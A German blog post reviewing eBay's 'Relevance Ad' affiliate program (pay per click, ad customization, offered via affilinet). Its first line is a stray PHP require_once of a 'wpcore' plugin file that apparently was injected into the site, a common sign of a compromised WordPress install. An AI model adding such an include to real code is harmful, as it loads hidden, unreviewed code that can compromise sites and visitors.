require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); eBay Relevance Ad | Beste-Partnerprogramme.de

eBay Relevance Ad

10. November 2008
By

Das “eBay Relevance Ad”-Programm ist ganz ähnlich wie Googles Adsense oder Contaxe ein Partnerprogramm, bei dem nur themen- und inhalterelevante Anzeigen ausgegeben werden.

Das Besondere beim eBay Programm ist hierbei allerdings, dass (manche werden sagen “natürlich”) nur Auktionen auf eBay als Anzeigen ausgegeben werden.
So kann der Besucher einer Seite – sofern er das denn möchte – mit einem Klick gleich auf eBay-Verkäufen zu dem gesuchten Produkt landen.

Hierin liegt damit dann aber auch leider gleich die Beschränktheit dieses Anzeigenformats: Webmaster mit sehr speziellen und allgemeinen Inhalten, also solche, die nicht über ein bestimmtes Produkt schreiben, werden mit dem Partnerprogramm wenig Freude haben.
Als Beispiel: Zum Themenbereich “SEO” wird es deutlich weniger Auktionen auf eBay geben, als zum Thema “Netbooks”. Die Klicks bei thematischen Orientierungen wie “SEO” dürften daher deutlich geringer ausfallen, als bei einer Ausrichtung nach “Netbooks”.

Alle Webmaster, für die das Partnerprogramm dennoch interessant sein dürfte:

  • Die Klickvergütung liegt bei bis zu 15 Cent pro Klick (im Weihnachtsverkauf gar bei 18 Cent pro Klick, hängt aber immer nach der Qualität der Webseite ab.)
  • Die Anzeigen können sehr komfortabel nach den eigenen Farbvorstellungen generiert werden
  • Man kann in begrenztem Maße sogar Einfluss auf die Produktauswahl nehmen.
  • Die Vorschau des Werbemittels wird in Echtzeit angezeigt.

Das Partnerprogramm wird angeboten im Netzwerk affilinet.

Tags: , , , , , , , , ,